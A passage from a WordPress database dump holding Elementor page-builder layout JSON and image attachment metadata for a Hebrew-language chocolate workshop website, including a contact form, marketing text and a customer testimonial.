invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":12,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/Group-11.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":12,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/Group-11.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":12,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/Group-11.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":12,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/Group-11.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":23,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/ali-inay-9858.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(78,7,'_elementor_version','2.9.8'),(79,28,'_wp_attached_file','2018/05/c-company.png'),(80,28,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:174;s:6:\"height\";i:174;s:4:\"file\";s:21:\"2018/05/c-company.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"c-company-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:21:\"c-company-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(86,30,'_wp_attached_file','2018/05/c-kids.png'),(87,30,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:174;s:6:\"height\";i:174;s:4:\"file\";s:18:\"2018/05/c-kids.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"c-kids-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:18:\"c-kids-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(88,31,'_wp_attached_file','2018/05/c-woman.png'),(89,31,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:174;s:6:\"height\";i:174;s:4:\"file\";s:19:\"2018/05/c-woman.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"c-woman-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:19:\"c-woman-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90,32,'_wp_attached_file','2018/05/c-couple.png'),(91,32,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:174;s:6:\"height\";i:174;s:4:\"file\";s:20:\"2018/05/c-couple.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"c-couple-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:20:\"c-couple-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(92,33,'_wp_attached_file','2018/05/logoup.png'),(93,33,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:198;s:6:\"height\";i:171;s:4:\"file\";s:18:\"2018/05/logoup.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"logoup-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:18:\"logoup-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(94,34,'_wp_page_template','elementor_canvas'),(95,34,'_elementor_edit_mode','builder'),(96,34,'_elementor_template_type','post'),(97,34,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"